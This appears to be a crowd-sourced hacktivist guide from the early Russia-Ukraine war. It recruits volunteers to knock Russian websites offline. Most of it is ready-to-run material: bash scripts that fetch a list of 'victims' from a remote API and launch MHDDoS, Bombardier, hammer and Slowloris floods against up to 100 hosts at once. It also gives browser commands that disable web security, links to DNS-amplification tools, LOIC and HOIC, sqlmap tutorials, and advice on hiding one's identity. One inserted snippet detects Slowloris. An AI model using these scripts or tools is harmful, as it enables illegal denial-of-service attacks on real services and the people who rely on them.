IT Army of Ukraine - Cyber Weapons Division

Introduction

Russia has invaded Ukraine and committed various war crimes. Russian media denies any attacks on civilians and denies any Russian troop casualties. According to them, they are doing this "special operation" to protect Ukrainians from Ukraine.

Mykhailo Fedorov (Vice Prime Minister and Minister of Digital Transformation of Ukraine) has shared this Twitter post encouraging cyberattacks on certain targets via a Telegram group. This will be the primary source of the target websites for this application.

Some foreign media and even countries (e.g. Belarus) publicly support Russian aggression towards Ukraine.

More info at https://war.ukraine.ua/

BEWARE: it's a cyberwar, but DDoS is considered illegal in almost every country.

Also, you will risk having your internet blocked by your provider or having your contract cancelled.

I don't support aggression over peaceful entities, but we are in war, we are defending ourselves, and helping the assaulted to defend from its aggressor; in that case, I don't see any ethical or moral violation in DDoSing the aggressor.

This document is in constant update. You may find new and updated content as you visit this document again.

Usage

Using a Web Browser

Your mission here is simple: you will DDoS strategic Russian websites/endpoints in order to take them down or significantly disrupt their services.

For now you have two different methods. The first is using one of the URLs below. The other option is using a DDoS script on Ubuntu Linux.

You may want to use a VPN service to hide your identity before doing it, I recommend using Hola VPN on Opera Browser

Opera Browser also has a built-in VPN option

I also recommend changing your DNS server to 9.9.9.9 and using DNS over HTTPS, and also use randomized MAC Addresses

If you're OK with Linux, ideally you may want to boot a Tails Linux OS instead; this is the safest option.

You can use any of the websites below; just leave it open in your browser as long as possible:

https://fuckyourussianwarship.netlify.app

https://ddosmonitor.pp.ua/

Also check:

https://github.com/Arriven/db1000n

Cossacks, we present you a new weapon!

Our own program - Death by 1000 needles (DB1000N)

This is software for coordinated DDoS attacks on the occupier's infrastructure. The main advantage of this method is that users only need to run the program on a PC to carry out attacks, and all coordination will be carried out and configured by administrators with the support of cybersecurity specialists.

Instructions for use and all necessary links are in this document

Please join everyone and download the program to your PC before the evening attacks, because then we will carry out the first attack with DB1000N. Stay tuned for the channel and upcoming updates.

Other options:

https://stop-russian-desinformation.near.page/
https://the-list.ams3.cdn.digitaloceanspaces.com/index.html
https://russianwarshipgofuckyourself.club/
https://norussian.tk/
https://stopwarnow.github.io/
https://ipfs.io/ipfs/QmYKMHHNfdxfhDtXujimFaG83ZkgkTo61p8jZ6Dww9kJaN?filename=index.html

IPFS is a distributed uncensorable file system, please upload the html/js DDoS tools to IPFS nodes to avoid censorship, and let me know to update the document with the IPFS link.

Disabling CORS is necessary to be able to get the most performance out of those pages.

See how here.

Or you can simply use a browser extension

If you want to attack a single target you can use: https://freestresser.to/

You can verify some Russian servers' status at https://rustatus.xyz/status, https://ddosmonitor.pp.ua/ and http://ru-stats.eastasia.cloudapp.azure.com/status

If you need to verify an individual site, use https://downforeveryoneorjustme.com/gazprom.ru

You can monitor the attack progress by pressing F12 (open dev tools) and navigating to the Network tab.

You can use a headless browser, such as Firefox, on the command line with those websites.

With a headless browser you can attack using https://shell.cloud.google.com

You can enable WSL to use a Linux Shell on your Windows system

With WSL you can run all the scripts below in this article

Firefox Windows:

firefox --headless --private-window https://norussian.tk/

Chrome Windows:

"[CHROME PATH HERE]/chrome.exe" --disable-web-security https://norussian.tk/

Chrome Mac:

open -na Google\ Chrome --args --user-data-dir=/tmp/temporary-chrome-profile-dir --disable-web-security --disable-site-isolation-trial https://norussian.tk/

Petitions and other forms of helping

Please sign

Send SMS messages to Russian people, help fight Russian propaganda
https://1920.in/

You can also write messages on Russian map locations using this tool
https://github.com/jamesdh/kompromat

Using on Ubuntu Linux

If you're a more advanced user, you can run a shell script on an Ubuntu Linux system to DDoS the websites.

This is a script that I have made to run multiple parallel DDoS attacks.

There is this tool, very nice indeed: https://github.com/seedpockets/ukrainian-warship

The API currently has more than 3000 targets; the script will randomly select 100 of the total.

We will improve the API to give precedence to priority targets and classify the targets, like military, business, the state, banks, crypto exchanges, etc.

Please use a VPN before using the script. Ask on Telegram groups, there are a lot of NordVPN accounts they are sharing. Also check the free options in this document below.

You can also utilize this script on your Android device with Termux.

https://github.com/TermuxHackz/Hammer

Please check this awesome endeavour: https://github.com/prividcasper/RvK01RMD

Note that those tools were made for single URLs only, so using them on multiple URLs with this script may be hardware intensive.

To run the script, just copy and paste this on your terminal, and you're done. Leave it as long as possible:

If you don't want to run it on your computer you can use https://shell.cloud.google.com.

See how here or here

Or you can use the free VPSs listed in the footer of the document.

Using the script with MHDDoS

DDoS Attack Script With 40 Methods

#!/usr/bin/env bash
sudo apt update
sudo apt upgrade
sudo apt install jq
sudo apt install git
sudo apt install python
sudo apt install python
sudo apt install python3-pip
git clone https://github.com/MHProDev/MHDDoS.git
cd MHDDoS
pip3 install -r requirements.txt
targets_api="http://164.92.247.88:9300/victims"
curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt
for target in $(cat targets.txt); do 
  python3 start.py bypass "$target" 5 1000 socks5.txt 100 999999 &
done

Using the script with Bombardier

Bombardier is a HTTP(S) benchmarking tool. It is written in Go programming language and uses excellent fasthttp instead of Go's default http library, because of its lightning fast performance.

#!/usr/bin/env bash
sudo apt update
sudo apt upgrade
sudo apt install jq
wget https://github.com/codesenberg/bombardier/releases/download/v1.2.5/bombardier-linux-amd6
chmod 770 bombardier-linux-amd64
chmod +x bombardier-linux-amd64
targets_api="http://164.92.247.88:9300/victims"
curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt
for target in $(cat targets.txt); do 
  sudo ./bombardier-linux-amd64 -c 200 -d 99999999999s -l "$target"  &
done

Upgraded version:

#!/usr/bin/env bash

# settings
NUM_TARGETS=20
WORKERS=100
TARGETS_REFRESH=300
INSTALL_PATH="$HOME/cyberdefence-ua-ops"
BOMBARDIER_EXE="./bombardier-linux-amd64"


## make sure software is updated and dependencies are installed
sudo apt update
sudo apt upgrade
sudo apt install jq
sudo apt install curl
sudo apt install wget

## ensure we have Bombardier
# make sure path exists
mkdir -p "$INSTALL_PATH"
cd "$INSTALL_PATH"
# if exe is not there, then fetch it
if [[ ! -x "$BOMBARDIER_EXE" ]]; then
    wget https://github.com/codesenberg/bombardier/releases/download/v1.2.5/bombardier-linux-amd64
    chmod +x bombardier-linux-amd64
fi

# "Curated" API for targets
targets_api="http://164.92.247.88:9300/victims"

# loop forever until ^C interrupt 
while :
do
  # Get list of IPs from API, filter duplicates, random sort, and choose designated number 
  curl -s $targets_api | \
      jq -r .statuses[].ips[] | \
      sort --unique | \
      sort --random-sort | \
      head -n "$NUM_TARGETS" \
      > targets.txt
  
  # Loop through target IP list, start subprocess for each one
  for target in $(cat targets.txt); do
    #echo "$target"
    echo "$BOMBARDIER_EXE" -c "$WORKERS" -d "$TARGETS_REFRESH""s" -l "$target" 
    "$BOMBARDIER_EXE" -c "$WORKERS" -d "$TARGETS_REFRESH""s" -l "$target"  &
  done
  # ideally all target processes should be done after this, but we'll make sure
  sleep "$TARGETS_REFRESH"
  killall "$BOMBARDIER_EXE"
done

Using the script with hammer

DoS tools written in Python

#!/usr/bin/env bash
sudo apt update
sudo apt upgrade
sudo apt install python
sudo apt install git
sudo apt install syslinux-utils
sudo apt install jq
git clone https://github.com/cyweb/hammer
cd hammer
targets_api="http://164.92.247.88:9300/victims"
curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 2 > targets.txt
for target in $(cat targets.txt); do 
  target=$(echo $target | sed 's/https\?:\/\///') &&
  target=${target%/} &&
  target=$(gethostip "$target" | awk '{print $2}') &&
  python3 hammer.py -s "$target" &
done

Using the script with Slowloris

Send authorized HTTP traffic to the server.

As it makes the attack at a slow rate, traffic can be easily detected as abnormal and can be blocked.

#!/usr/bin/env bash
sudo apt update
sudo apt upgrade
sudo apt install python
sudo apt install git
sudo apt install jq
git clone https://github.com/gkbrk/slowloris.git
cd slowloris
targets_api="http://164.92.247.88:9300/victims"
curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt
for target in $(cat targets.txt); do 
  python3 slowloris.py "$target"  &
done
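
The slow-rate behaviour noted above for Slowloris is what makes it detectable from the server side. As an added example (not part of the original document), this Python code flags sources that hold many long-lived connections whose request headers never complete; the record fields, thresholds and sample data are constructed assumptions.

```python
from collections import defaultdict
from typing import NamedTuple


class Conn(NamedTuple):
    src: str            # client IP address
    open_secs: float    # how long the TCP connection has been open
    header_bytes: int   # request-header bytes received so far
    complete: bool      # True once the blank line ending the headers arrived


def make_sample():
    """Constructed connection-table snapshot (documentation IP ranges only)."""
    # One source trickling headers on six connections held open 45-120 s.
    conns = [Conn("203.0.113.7", 45 + 15 * i, 60 + 20 * i, False) for i in range(6)]
    # Normal client: requests completed quickly.
    conns += [Conn("198.51.100.20", 1.5, 420, True) for _ in range(3)]
    # A single slow (e.g. mobile) client: incomplete, but only one connection.
    conns.append(Conn("192.0.2.55", 40, 310, False))
    # Burst of brand-new connections that simply have not finished yet.
    conns += [Conn("198.51.100.99", 2, 80, False) for _ in range(8)]
    return conns


def flag_slow_header_sources(conns, min_open_secs=30, max_bytes_per_sec=10,
                             min_conns=5):
    """Return {src: stalled_connection_count} for sources that look abnormal.

    A connection is "stalled" when its headers are still incomplete after
    min_open_secs and it has averaged at most max_bytes_per_sec. A source is
    flagged only when it holds at least min_conns such connections, so one
    slow but legitimate client is not reported.
    """
    stalled = defaultdict(int)
    for c in conns:
        if c.complete or c.open_secs < min_open_secs:
            continue
        if c.header_bytes / c.open_secs <= max_bytes_per_sec:
            stalled[c.src] += 1
    return {src: n for src, n in stalled.items() if n >= min_conns}


if __name__ == "__main__":
    print(flag_slow_header_sources(make_sample()))
```

Header-read timeouts and per-source connection limits on the web server or reverse proxy (for example nginx's `client_header_timeout`) enforce the same rule at connection time.
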

For MacOS Users

You need Python, Git, and JQ installed.

If you want to use another tool, tune accordingly.

git clone https://github.com/cyweb/hammer
cd hammer
targets_api="http://164.92.247.88:9300/victims"
curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt
for target in $(cat targets.txt); do 
  target=$(echo $target | sed 's/https\?:\/\///') &&
  target=${target%/} &&
  host=$(echo $target | cut -d'/' -f3) &&
  target2=$(host "$host" | head -1 | awk '{print $4}') &&
  python3 hammer.py -s "$target2" &
done

API For Devs

If you're a developer, we have created APIs with the current targets.

You can help me improve this document, but you will need to create an account on hackmd.io and text me on Telegram with the email you used in order to have edit access to this document.

You can fetch the data using the targets list and the target object name. On the command line, you will need curl and jq.

curl -s https://api.npoint.io/7244571a09d1f5274a45 | jq -r .targets[].target
curl -s http://164.92.247.88:9300/victims | jq -r .statuses[].url

Current Targets

Processed, ranked and classified:
https://reqbin.com/jeqixot4

Raw data:
https://reqbin.com/hot28zo2

Another source:
https://itarmy.pp.ua/api/?type=online

Free VPS

https://aws.amazon.com/pt/free/

https://www.oracle.com/cloud/free/

https://gratisvps.net/

https://baehost.com/en-int/vps-argentina/vps-gratis

Free VPNs

ClearVPN

Please, do not select Ukraine on the VPN. Citizens in Ukraine must be able to access the Internet

https://protonvpn.com/
https://www.f-secure.com/
https://www.urban-vpn.com/
https://atlasvpn.com/vpn-for-windows

Other DDoS Tools

This one is hot:
https://github.com/seedpockets/ukrainian-warship

https://github.com/ajax-lives/NoRussian - HTML ajax ddos

https://github.com/smok-serwis/siege-engine - take a look

https://github.com/1N3/Sn1per - useful to do main recon

https://github.com/thesc1entist/j0lt - dns amplification tool

https://github.com/OffensivePython/Saddam - dns amplification tool

https://github.com/0xc0d/Slow-Loris - Slow DDos to exhaust connection

https://github.com/XCHADXFAQ77X/SLOWLORIS - another way

https://github.com/gkbrk/slowloris.git - another slowloris repo

https://github.com/cyweb/hammer - tool that I have used

https://github.com/TermuxHackz/Hammer - same tools for Termux on android.

https://github.com/Avielyo10/DNS-Amplification-Lab - other kinds of attack

https://www.yougetsignal.com/tools/web-sites-on-web-server/ https://www.ip-address.org/reverse-lookup/reverse-ip.php - find other websites hosted on the same server.

https://github.com/LimerBoy/Impulse

https://github.com/maxng07/dns-flood

https://ufonet.03c8.net/

https://github.com/MHProDev/MHDDoS - Best DDoS Attack Script Python3, Cyber Attack With 40 Methods

https://sourceforge.net/projects/loic/ - Famous LOIC

UDP, TCP, and HTTP requests to the server

Test the performance of the network.

Loic does not hide an IP address.

Perform stress testing.

HIVEMIND mode will allow you to control remote LOIC systems. With the help of this, you can control other computers in a zombie network.

https://sourceforge.net/projects/highorbitioncannon/ - infamous hoic

Attack up to 256 websites at once.

counter to measure the output.

ported over to Linux or Mac OS.

Shut Down YouTube Channels!

Let's shut down more news YouTube channels that openly lie about the war in Ukraine.

YouTube channels:

First channel: https://www.youtube.com/channel/UCX9-cJy8dZWDI8hCnmahuLA

Russia 24: https://www.youtube.com/c/Russia24TV

TASS: https://www.youtube.com/c/TASSagency

RIA Novosti: https://www.youtube.com/user/rianovosti

https://www.youtube.com/channel/UC8Nl7TQLC6eX8MTRCuAw3SA

https://www.youtube.com/channel/UCGRcod_jR4sC9XUMLCv4GJQ

https://www.youtube.com/channel/UCSqO8lV-ric7ow5G5q9roWw

https://www.youtube.com/channel/UCdyhZX5wt6B6dSIAT7X9dNw

https://www.youtube.com/channel/UCRHhScZmH-SfBin8tbTixPA

https://www.youtube.com/channel/UC3rZ3DKoeiccjl-e-lams_g

https://www.youtube.com/channel/UCJvDYmmZDbeDy5N_aBxXjpA

https://www.youtube.com/channel/UCMTaJV_Gyp1YOWJwSNa0wRw

https://www.youtube.com/channel/UC8lCS8Ubv3t0-Tf4IYLioTA

YouTube bloggers:

ZIMA LIVE: https://www.youtube.com/c/ZimaLive

Соловьёв LIVE: https://www.youtube.com/channel/UCQ4YOFsXjG9eXWZ6uLj2t2A

How to report channels:

⁃ Turn on your laptop or desktop computer.

⁃ Turn on VPN as most channels are not available in Ukraine.

⁃ Sign in to your YouTube account.

⁃ Open the desired channel.

⁃ Go to the About tab.

⁃ Find the flag image and click on it.

⁃ Select the appropriate violation description from the drop-down menu.

SQLi

https://hackertarget.com/sqlmap-tutorial/

https://www.binarytides.com/sqlmap-hacking-tutorial/

Also check out other initiatives:

https://github.com/erkexzcx/stoppropaganda

https://www.reddit.com/r/hacking/comments/t1a8is/simple_html_dos_script_for_russian_sites/

https://www.russianwarchatter.info/ - Known Russian Military Frequencies

Specialize

If you want to become an expert in the IT security field, you may want to start by reading these curated awesome guides:
https://github.com/onlurking/awesome-infosec
https://github.com/rmusser01/Infosec_Reference
